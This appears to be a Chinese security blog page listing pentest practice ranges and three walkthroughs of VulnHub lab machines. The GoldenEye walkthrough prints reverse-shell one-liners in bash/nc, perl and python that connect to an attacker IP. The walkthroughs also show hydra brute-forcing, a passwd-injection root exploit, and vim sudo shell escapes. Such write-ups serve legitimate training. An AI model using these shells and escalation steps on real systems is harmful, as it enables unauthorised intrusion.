首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,828 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,158 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,322 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
43
篇与
的结果
2026-01-08
全网最全渗透测试靶场推荐【2026最新靶场推荐】,拒绝信息差
这次又新增了五个常用的靶场平台,帮助师傅们在学习渗透测试的路上不迷路,在开始之前呢推荐一个永久的渗透测试知识库,点击下方链接领取1、cyberstrikelab网址:https://www.cyberstrikelab.com/CyberStrikeLab 中的综合场景包含了域渗透和内网渗透,总体上web偏简单,内网较难,也是从基础的永痕之蓝漏洞的3台靶机开始,慢慢的到7-8台内网机器,想要在这多层网络中横向移动,还是很有挑战性的,其中部分靶机涉及到免杀,需要使用最新的免杀手法攻克靶机。相关学习文章:【域渗透】CyberStrikelab靶场lab1-lab11,3w字超详细推荐指数:⭐⭐⭐⭐⭐2、hackthebox网址:https://app.hackthebox.com/Hack The Box 是一个国际知名的网络安全渗透测试实战靶场平台,提供在线的渗透测试环境与挑战,帮助网络安全学习者与从业者提升实战技能。对于HTB的排行,在国外的企业中还是很看重的,想冲外企的师傅们可以冲一冲HTB排行推荐指数:⭐⭐⭐⭐⭐⭐相关学习文章:HTB-Chemistry靶机渗透教程3、BurpSuite靶场https://portswigger.net/web-security/all-labs包含了各种web漏洞,比如http污染,走私,SQL注入,XSS,xxe等等,非常有学习参考的价值的,并且他们还推出了BSCP认证(含金量不大)推荐指数:⭐⭐⭐⭐4、好靶场http://www.loveli.com.cn/覆盖从0学习,通用漏洞,SRC漏洞,CTF等实战环境,无门槛。 独创技能树体系,帮你科学规划成长路径,高效进阶。每个靶场都有独立的故事情节,让你在打靶场学习SRC漏洞挖掘思路的同时不无聊。并且很多靶机都是自己的原创靶机推荐指数:⭐⭐⭐⭐⭐5、极域靶场地址:https://longyusec.com 预计年后推出泷羽Sec作者白小羽自研,目前内测中,这里做一个预告,目标是打造一个从0开始学渗透的原创靶场系列,原本是打算叫零域靶场,但是已经有了零域网安,就换了一个名推荐指数:⭐⭐⭐6、OffSec-PG靶场https://www.offsec.com/OffSec靶场,也就是PG靶场,OSCP,OSEP等认证的官方靶场,分别代表着国际渗透测试中级认证(OSCP),和高级认证(OSEP),红队必考证书,也是走向外企必考的证书之一这些证书也是全球公认的实战型渗透测试认证标杆,以严苛的实操考试著称,在企业招聘渗透测试工程师时认可度极高。国内近几年也开始认可OffSec系列证书,被浙江省规划为高级认证(OSEP)中,其中OSCP为中级认证若您需要OSCP和OSEP相关的培训,可以咨询我们推荐指数:⭐⭐⭐⭐⭐⭐7、LingJing(灵境)靶机https://github.com/414aaj/LingJingLingJing 是一款专为复杂网络环境渗透测试量身打造的桌面级本地网络安全靶场平台。手机扫码下载推荐指数:⭐⭐⭐⭐8、hackmyvm网址:https://hackmyvm.eu/hackmyvm 是一个国际性的网络安全靶场平台,提供多种虚拟机镜像靶机,用户可使用 VMware 或 VirtualBox 运行,挑战目标是获取操作系统的 root 权限和查看 flag。其靶机涵盖从入门到高阶的难度,适合不同水平的渗透测试爱好者学习与练习。这个靶场类似于vulnhub,是综合靶机,其中部分靶机包含了域,还有少有的开源windows机器相关文章:全网首发!HMV全套13台windows域渗透教程,3w字超详细!推荐指数:⭐⭐⭐⭐⭐9、Yakit靶场-VulinboxVulinbox 是一个精心设计的 Web 安全漏洞靶场,它模拟了各类真实场景中可能出现的安全漏洞,为安全研究人员和渗透测试工程师提供了一个理想的学习和实践平台。推荐指数:⭐⭐⭐⭐10、The Hackers Labshttps://thehackerslabs.com/这是一个由行业专家设计的专业平台,提供网络安全培训、企业级解决方案,以及各种实践性的黑客挑战项目。最棒的是:所有这些服务都是完全免费的!你可以亲自尝试这些功能,学习相关知识,还能与黑客社区的其他成员一起参与竞赛!windows靶机分享,免官网下载,扫码即可保存:推荐指数:⭐⭐⭐⭐⭐11、Root Me网址:https://www.root-me.org/Root Me 是一个国际知名且免费的在线网络安全学习平台,提供CTF风格的网络安全挑战,涵盖密码学、WEB、脚本、网络、编程等内容的靶场,适合中高级学习者。12、Try Hack Me网址:https://tryhackme.com/Try Hack Me 是一个适合初学者的在线网络安全学习平台,提供结构化的课程、实战靶场和 CTF 挑战,帮助用户提升从基础到高级的网络安全技能。包括windows和Linux的靶场渗透。推荐指数:⭐⭐⭐⭐⭐13、vulfocus网址:https://vulfocus.cn/Vulfocus 是一个漏洞集成平台,将漏洞环境 Docker 镜像放入即可使用,开箱即用,可用于漏洞复现、POC 验证、EXP 验证等,它由白帽汇推出,本质上是一个漏洞靶场。多数用于快速测试和学习nday的攻击手法。推荐指数:⭐⭐⭐⭐14、vulhub网址:https://github.com/vulhub/vulhubVulhub 是一个开源的漏洞靶场项目,基于 Docker 和 Docker-Compose 技术,提供一系列预构建的漏洞环境,用户可以快速搭建和测试各种漏洞场景,适合中高级学习者进行漏洞复现和研究推荐指数:⭐⭐⭐15、vulnhub网址:https://www.vulnhub.com/和hackmyvm类似,是一个开源漏洞靶场项目,基于 Docker 和 Docker-compose 技术,提供一系列预构建的漏洞环境,用户可快速搭建和测试各种漏洞场景,适合中高级学习者进行漏洞复现和研究。推荐指数:⭐⭐⭐⭐⭐16、vulntargethttps://github.com/crow821/vulntargetvulntarget 最初由星期五实验室发起,早期作为综合性实战靶场由网络安全爱好者共同维护。目前,从 vulntarget-n 开始,该靶场由crow 单独负责维护。目前正在不断更新中。。。。。。vulntarget是一个开源的靶场,也欢迎提交您的设计!扫码下载推荐指数:⭐⭐⭐⭐17、XCTF攻防世界网址:https://adworld.xctf.org.cn/XCTF 攻防世界是一个专注于网络安全的在线平台,提供大量高质量的 CTF 题目和实训环境,适合不同水平的学习者提升实战技能。推荐指数:⭐⭐⭐⭐18、XSS小游戏网址:https://xss.haozi.me/#/XSS学习必备的小游戏推荐指数:⭐⭐19、墨者学院网址:https://www.mozhe.cn/墨者学院是一个专业的网络安全在线靶场平台,专注于实战技能培养,适合网络安全学习者提升攻防能力。推荐指数:⭐⭐⭐⭐20、封神台网址:https://hack.zkaq.cn/封神台是掌控安全推出的一个在线攻防演练靶场,专注于网络安全渗透测试演练,适合网络安全学习者和从业者进行实战技能提升推荐指数:⭐⭐⭐21、春秋云镜https://yunjing.ichunqiu.com/春秋云镜是一个专注于实战化的网络安全攻防演练靶场平台,提供了多样化的漏洞环境和场景,以帮助用户提升网络安全技能和攻防实战能力。推荐指数:⭐⭐⭐⭐22、玄机靶场https://xj.edisec.net/玄机靶场是一个专业的网络安全实验平台,提供多样化的攻击场景库和丰富的题库,涵盖渗透测试、应急响应、CTF竞赛等领域,适合不同层次的学习者进行实战训练,提升网络安全技能。推荐指数:⭐⭐⭐⭐23、红日靶场http://vulnstack.qiyuanxuetang.net/vuln/红日靶场是一个由红日安全团队打造的网络安全靶场平台,其特点是提供模拟真实企业内网的环境,涵盖域控、黄金票据等高级内网渗透场景,适合具备一定基础的学习者进行实战训练。靶场通过虚拟机镜像形式提供,需本地部署使用推荐指数:⭐⭐⭐⭐⭐24、CTFhubhttps://www.ctfhub.com/CTFHub 是一个专注于信息安全竞赛的在线学习平台,提供题目练习、赛事跟踪等服务,适合 CTF 爱好者学习和提升技能。它有完整的top10基础靶场还有技能树,非常适合初学者,不管是CTF还是刚入门不久的师傅们,只要签到就能领金币推荐指数:⭐⭐⭐⭐⭐25、ctfshowhttps://ctf.show/CTFShow 是一个在线的网络安全学习平台,提供丰富的 CTF 题目和解题思路,适合 CTF 爱好者学习和提升技能。知名CTF平台,由1w+ctfser们打造推荐指数:⭐⭐⭐⭐⭐26、AltoroJhttps://demo.testfire.net/AltoroJ 是一个开源的银行应用程序,用于展示 Web 应用安全漏洞,适合网络安全学习者进行安全测试和教育训练。它包含多种漏洞,如 SQL 注入、跨站脚本攻击等,旨在帮助学习者深入了解 Web 应用的安全性问题和防御策略。推荐指数:⭐⭐⭐27、vulnwebhttp://vulnweb.com/Vulnweb 是一个故意设置安全漏洞的 PHP 在线商店示例,用于测试网页漏洞扫描工具和技能,如 SQL 注入、跨站脚本攻击等。它模拟真实的漏洞环境,帮助开发者、安全研究人员和学生学习常见的 Web 应用安全漏洞推荐指数:⭐⭐⭐28、XSS-LABhttps://vuln.longyusec.com/XSS-labs是一个专注于跨站脚本攻击(XSS)学习和测试的开源靶场,提供多种XSS漏洞场景,帮助用户理解XSS攻击原理、掌握防御技巧,并通过实践提升安全意识和技能。这也是新手必刷靶场了推荐指数:⭐⭐⭐⭐29、SQL-LABShttps://vuln.longyusec.com/sql-libs是一个专门用于学习和测试SQL注入的开源平台,它提供了一系列的注入场景和关卡,帮助开发者和安全测试人员深入理解SQL注入的原理和防范方法。通过sql-libs,用户可以实践不同类型的SQL注入攻击,并学习如何编写安全的代码来避免这些漏洞。新手必刷靶场推荐指数:⭐⭐⭐⭐30、DVWAhttps://vuln.longyusec.com/DVWA是一个用于演示网页应用安全漏洞的开源软件平台,旨在帮助安全专业人士、学生及开发者理解并学习常见安全漏洞。它模拟了多种漏洞场景,如SQL注入、XSS等,提供安全测试环境。新手必练靶场之一。推荐指数:⭐⭐⭐⭐31、upload-labshttps://vuln.longyusec.com/upload-labs是一个使用PHP语言编写的,专门用于渗透测试和CTF中遇到的各种文件上传漏洞的靶场,旨在帮助用户深入了解文件上传漏洞的原理和防范措施。它提供了一系列模拟文件上传漏洞的实验环境,每个关卡都包含着不同的上传方式和挑战。推荐指数:⭐⭐⭐⭐32、mutillidaehttps://vuln.longyusec.com/Mutillidae 是一个免费、开源的 Web 应用程序安全漏洞靶场,由 OWASP 社区支持,包含丰富的渗透测试项目,如 SQL 注入、跨站脚本攻击、文件包含等,旨在帮助学习者理解和发现常见的 Web 应用安全问题。推荐指数:⭐⭐⭐33、JAVA Sec Labhttps://github.com/whgojp/JavaSecLabJavaSecLab 是一款综合型 Java 漏洞平台,提供相关漏洞缺陷代码、修复代码、漏洞场景、审计 SINK 点、安全编码规范,覆盖多种漏洞场景,拥有友好用户交互 UI,适合安全研究人员、开发人员和安全服务人员学习和理解 Java 安全漏洞的生成、修复和审计过程。推荐指数:⭐⭐⭐⭐⭐感谢师傅能看到这里再送一波福利,师傅们不想要一个一个看,那么我都准备好了,在 longyusec.com 中点击相关的链接就可以进入相应的靶场啦,如果还有比较热门的靶场没有提交到这,欢迎师傅们投稿 + baibaixiaoyu2024往期推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等内网渗透,流量转发Linux内网渗透(2w字超详细)AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_Docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2026年01月08日
1,787 阅读
0 评论
0 点赞
2025-11-11
内网渗透实战:从Web打点到域控通关
暂无简介
2025年11月11日
1,241 阅读
0 评论
0 点赞
2025-10-15
vuln靶机-GoldenEye1.1,OSCP必刷靶机
靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/首先我们使用arp-scan -l进行内网主机探测使用nmap对靶机进行端口探测打开web80端口提示我们需要进入/sev-home/这个目录下面进行登录显然这是一个401验证下面出现了一个编码的password,还有一个用户BorisInvincibleHack3r看样子是html编码,解码试试,得到结果InvincibleHack3r我们用这个已知的用户进行登录,第一次大写的Boris登录失败,这里需要使用小写的boris,就能登录成功啦这里有一个提示就是pop3服务器运行在一个非常高的端口上,我们查看源代码的时候需要一直往下翻,找到两个用户分别是Natalya,Boris将可能的用户加入到这个字典开始爆破hydra -L ./user.txt -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-10000.txt -s 55007 10.10.10.134 pop3 -vV -t 10爆破成功一个用户我们使用nc连接目标地址(根据提示说pop3服务器在高端口),使用账号密码登录进去,有两封信第二封信包含了一个账号密码还有让我们修改hostsWindows路径:C:\Windows\System32\drivers\etc\hosts修改/etc/hosts后,这里就能得到一个cms访问severnaya-station.com/gnocertdir地址:继续点一点,发现要登陆,使用邮件获得的用户密码进行登陆用户名:xenia 密码:RCP90rulez!Home / ▶ My profile / ▶ Messages --->发现有一封邮件,内容发现用户名doak爆破用户名doak的邮件,获得用户名密码:doak/goatecho doak > GodenEye.txt ---将用户名写入txt文本中hydra -L GodenEye.txt -P /usr/share/wordlists/fasttrack.txt 10.10.10.134 -s 55007 pop3登录doak用户查看邮件信息邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。用户名:dr_doak密码:4England!使用新的账户密码登录CMS登录后在:Home / ▶ My home 右边发现: s3cret.txt 另外发现这是Moodle使用的2.2.3版本现在我们查看文件的内容,指出管理员凭据已隐藏在映像文件中,让我们在浏览器中打开图像以查看其内容。查看这个图片将图像下载到本地,使用strings进行分析,当然也可以使用exiftool图片分析工具wget http://severnaya-station.com/dir007key/for-007.jpg用以上命令都可以查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ==xWinter1995x!使用获得的信息进行登录用户名:GoldenEye密码:xWinter1995x!severnaya-station.com/gnocertdir线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序,切换到admin用户登录即可成功将代码替换到Path to aspellip改为攻击机ip,然后点击Save changes接着在kali上监听1234端口,然后找到Home / ▶ My profile / ▶ Blogs / ▶ Add a new entry,点击下图3的位置反弹shell提示了一个错误,说未发现拼写错误那么多尝试几个反弹shell的命令rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.130 1234 >/tmp/fperl -e 'use Socket;$i="10.10.10.130";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.130",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'直到使用python使用FeatherScanwget 10.10.10.130:8000/FeatherScan.shchmod +x FeatherScan.sh./FeatherScan.sh来看看有没有可以利用的suid文件并且可能存在藏牛提权那么我们尝试使用藏牛进行提权,使用openssl生成一个密码然后将github下载下来的藏牛脚本移动到靶机上,并进行编译我们检查一下这个系统有没有gcc和cc,是没有gcc的我们可以使用cc命令,这里编译报错不用管,不影响脚本使用随后写一个passwd标准用户,到一个临时passwd文件中,利用藏牛脚本进行提权,就没有任何回应了,可能添加成功了,但是需要重启靶机,而且再次点击那个ABC按钮进行反弹shell也不会成功,所以判断不了是否添加成功,那么就是失败echo "xiaoyu:$1$abc$mJPQCTATLDV5aNzcHMYLr/:0:0::/root:/bin/bash" > /tmp/passwd./exp1 /etc/passwd "$(cat /tmp/passwd)"重启靶机重新反弹shell,再看看有没有内核漏洞使用FeatherScan.sh查看完整的系统信息searchsploit ubuntu 3.13 14.04 Privilege看到一个合适的,直接复制下来检查一下有没有用到gcc的,因为靶机不能用gcc然后我们需要修改这个gcc为cc命令然后从kali中下载这个exp,编译并执行,报错没关系,提权还是能正常提权的全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,OSCP,osep等等往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年10月15日
1,076 阅读
0 评论
0 点赞
2025-10-15
vulnhub靶机-devt-improved,nano/vim提权
靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-development,280/nmap 详细扫一下端口开放情况访问8080端口,发现IIS版本是6.0翻译告诉我们可以访问这个界面查看更多信息这里发现一个目录Patrick,Intern作为可能的用户查看源码发现了一个test.pcap流量包使用大鲨鱼打开,找到了一个get请求并且是php文件尝试访问,告诉我们没有要处理的事务来到这个界面,四处点点有个登录框继续找,发现了一个密码再继续对这个目录进行扫描gobuster dir -u http://10.10.10.130:8080/developmentsecretpage/ -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-2.3-big.txt -x html,txt,php,js发现一个version.txt,里面有一个slog_users.txt提示http://10.10.10.130:8080/developmentsecretpage/version.txt来访问解密结果intern:12345678900987654321patrick:P@ssw0rd25qiu:qiu只有第一个用户能ssh登录echo os.system('/bin/bash')这个用户有点特殊,它能本地切换,但是ssh连接不了上FeatherScan进行提权信息收集,发现可以使用nano和vim进行提权依次输入上面的命令提权成功!同样的也可以使用vim进行提权sudo vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'# 或者sudo vim -c ':!/bin/sh'全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,OSCP,osep等等往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年10月15日
1,004 阅读
0 评论
0 点赞
2025-09-11
Photographer 1-vulnhub靶机渗透
官网链接:https://download.vulnhub.com/photographer/Photographer.ova这是80端口第一时间查看源码,这是作者的信息,可能有用随后对这个靶机进行全端口扫描使用无密码连接并显示SMB服务器的文件列表(需要SMB服务器支持无密码连接),有一个sambashare共享文件夹无密码登录进去看看,登录成功了是agi发给daisa的一封邮件,告诉daisa网站已经搭建好了,不要忘记你的密码:babygirl我们使用dirsearch扫描的时候,扫描到一个后台地址/admin,输入它的邮箱和密码,就可以登录啦这是登录成功的界面那么漏洞呢?我们使用whatweb cms指纹识别工具,识别到了这个cms系统为koken 并且版本为 0.22.24 ,然后使用searchsploit漏洞检索出这个漏洞利用信息查看是怎么利用的嘞,大概就是讲需要登录到后台,然后上传一个 shell.php.jpg 一个图片格式的php马,然后利用burp修改后缀为shell.php这样就可以getshell了那么我们根据他的提示来,找到这个import content抓包之后修改我们反弹shell的php文件后缀在前端找到这个shell.phpkali要进行监听,点击后就可以反弹shell了,这个时候还需要创建一个交互式的终端python3 -c 'import pty;pty.spawn("/bin/bash")'我使用featherscan看到计划任务中包含了php这个东西,可能会有点用随后featherscan又看到了suid文件php7.2这个东西那么我们就可以直接进行提权了,什么?提权原理?suid提权谁还不会啊?来看看这篇find提权文章给你详解,利用的就是suid权限:Linux中Find命令也能提权?提权方式一文通透全网低价证书找我 + baibaixiaoyu2024包括且不限于cisp,cisp-pte,pts,cissp,cisp-ire,cisa,OSCP,osep等等往期推荐新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年09月11日
1,648 阅读
0 评论
0 点赞
1
2
...
9